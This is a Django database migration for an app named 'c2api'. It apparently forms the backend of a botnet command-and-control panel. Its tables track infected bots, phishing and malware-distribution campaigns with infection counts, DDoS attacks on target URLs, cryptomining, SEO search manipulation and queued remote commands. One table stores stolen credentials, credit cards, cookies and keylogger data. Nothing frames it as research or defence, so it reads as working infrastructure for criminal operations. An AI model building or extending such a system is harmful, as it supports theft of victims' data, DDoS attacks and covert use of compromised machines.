# Generated by Django 5.2 on 2025-11-10 12:53

import django.db.models.deletion
import uuid
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Bot',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('bot_id', models.CharField(max_length=100, unique=True)),
                ('bot_type', models.CharField(choices=[('python', 'Python Client'), ('web', 'Web Browser'), ('mobile', 'Mobile App'), ('binary', 'Compiled Binary')], default='python', max_length=20)),
                ('ip_address', models.GenericIPAddressField()),
                ('hostname', models.CharField(max_length=255)),
                ('platform', models.CharField(choices=[('windows', 'Windows'), ('linux', 'Linux'), ('android', 'Android'), ('ios', 'iOS'), ('web', 'Web Browser')], max_length=20)),
                ('architecture', models.CharField(max_length=50)),
                ('username', models.CharField(max_length=100)),
                ('priveleges', models.CharField(max_length=50)),
                ('status', models.CharField(choices=[('online', 'Online'), ('offline', 'Offline'), ('busy', 'Busy')], default='online', max_length=10)),
                ('last_seen', models.DateTimeField(auto_now=True)),
                ('first_seen', models.DateTimeField(auto_now_add=True)),
                ('cpu_cores', models.PositiveIntegerField(default=1)),
                ('memory_size', models.BigIntegerField(default=0)),
                ('disk_space', models.BigIntegerField(default=0)),
                ('internal_ip', models.GenericIPAddressField(blank=True, null=True)),
                ('mac_address', models.CharField(blank=True, max_length=17)),
                ('user_agent', models.TextField(blank=True)),
                ('can_mine', models.BooleanField(default=False)),
                ('can_ddos', models.BooleanField(default=False)),
                ('can_seo', models.BooleanField(default=False)),
                ('can_collect_data', models.BooleanField(default=False)),
                ('metadata', models.JSONField(blank=True, default=dict)),
            ],
            options={
                'indexes': [models.Index(fields=['status'], name='c2api_bot_status_79d5ac_idx'), models.Index(fields=['platform'], name='c2api_bot_platfor_97156a_idx'), models.Index(fields=['last_seen'], name='c2api_bot_last_se_a8a8cd_idx'), models.Index(fields=['bot_type'], name='c2api_bot_bot_typ_2484b1_idx')],
            },
        ),
        migrations.CreateModel(
            name='DeliveryCampaign',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=100)),
                ('delivery_method', models.CharField(choices=[('web', 'Web Delivery'), ('email', 'Email Phishing'), ('social', 'Social Media'), ('malware', 'Malware Distribution')], max_length=50)),
                ('target_url', models.URLField(blank=True)),
                ('payload_type', models.CharField(choices=[('javascript', 'JavaScript Bot'), ('python', 'Python Script'), ('executable', 'Executable'), ('mobile', 'Mobile App')], max_length=50)),
                ('infections', models.IntegerField(default=0)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('is_active', models.BooleanField(default=True)),
            ],
            options={
                'indexes': [models.Index(fields=['is_active'], name='c2api_deliv_is_acti_ac29e7_idx')],
            },
        ),
        migrations.CreateModel(
            name='SEOCampaign',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=100, unique=True)),
                ('keyword', models.CharField(max_length=255)),
                ('bots_assigned', models.IntegerField(default=0)),
                ('searches_performed', models.IntegerField(default=0)),
                ('start_time', models.DateTimeField(auto_now_add=True)),
                ('end_time', models.DateTimeField(blank=True, null=True)),
                ('is_active', models.BooleanField(default=True)),
            ],
            options={
                'indexes': [models.Index(fields=['is_active'], name='c2api_seoca_is_acti_f4bbaa_idx')],
            },
        ),
        migrations.CreateModel(
            name='Command',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('command_type', models.CharField(choices=[('system', 'System'), ('network', 'Network'), ('data', 'Data'), ('special', 'Special'), ('seo', 'Seo'), ('mining', 'Mining'), ('ddos', 'DDoS')], max_length=20)),
                ('command_name', models.CharField(max_length=100)),
                ('parameters', models.JSONField(blank=True, default=dict)),
                ('status', models.CharField(choices=[('pending', 'Pending'), ('executing', 'Executing'), ('completed', 'Completed'), ('failed', 'Failed'), ('timeout', 'Timeout')], default='pending', max_length=10)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('executed_at', models.DateTimeField(blank=True, null=True)),
                ('completed_at', models.DateTimeField(blank=True, null=True)),
                ('output', models.TextField(blank=True)),
                ('error', models.TextField(blank=True)),
                ('exit_code', models.IntegerField(blank=True, null=True)),
                ('encrypted_output', models.BinaryField(blank=True, null=True)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='commands', to='c2api.bot')),
            ],
            options={
                'ordering': ['-created_at'],
                'indexes': [models.Index(fields=['bot', 'status'], name='c2api_comma_bot_id_53add0_idx'), models.Index(fields=['created_at'], name='c2api_comma_created_e2e7cb_idx'), models.Index(fields=['command_type'], name='c2api_comma_command_4955ed_idx')],
            },
        ),
        migrations.CreateModel(
            name='DDOSAttack',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('target_url', models.URLField()),
                ('duration', models.IntegerField(default=60)),
                ('requests_sent', models.IntegerField(default=0)),
                ('start_time', models.DateTimeField(auto_now_add=True)),
                ('is_active', models.BooleanField(default=True)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ddos_attacks', to='c2api.bot')),
            ],
            options={
                'indexes': [models.Index(fields=['bot', 'is_active'], name='c2api_ddosa_bot_id_37f395_idx')],
            },
        ),
        migrations.CreateModel(
            name='ExfiltratedData',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('data_type', models.CharField(choices=[('file', 'File'), ('credentials', 'Credentials'), ('network', 'Network Info'), ('system', 'System'), ('browser', 'Browser Data'), ('keylogger', 'Keylogger Data'), ('cookies', 'Cookies'), ('credit_cards', 'Credit Cards'), ('passwords', 'Password')], max_length=20)),
                ('filename', models.CharField(blank=True, max_length=255)),
                ('description', models.TextField(blank=True)),
                ('raw_data', models.BinaryField(blank=True, null=True)),
                ('encrypted_data', models.BinaryField()),
                ('data_size', models.IntegerField(default=0)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('checksum', models.CharField(blank=True, max_length=64)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='exfiltrated_data', to='c2api.bot')),
            ],
            options={
                'ordering': ['-created_at'],
                'indexes': [models.Index(fields=['bot', 'data_type'], name='c2api_exfil_bot_id_e01448_idx')],
            },
        ),
        migrations.CreateModel(
            name='MiningOperation',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('algorithm', models.CharField(default='cryptonight', max_length=50)),
                ('intensity', models.IntegerField(default=50)),
                ('hashes_per_second', models.FloatField(default=0)),
                ('start_time', models.DateTimeField(auto_now_add=True)),
                ('end_time', models.DateTimeField(blank=True, null=True)),
                ('is_active', models.BooleanField(default=True)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mining_operations', to='c2api.bot')),
            ],
            options={
                'indexes': [models.Index(fields=['bot', 'is_active'], name='c2api_minin_bot_id_03e3a3_idx')],
            },
        ),
    ]
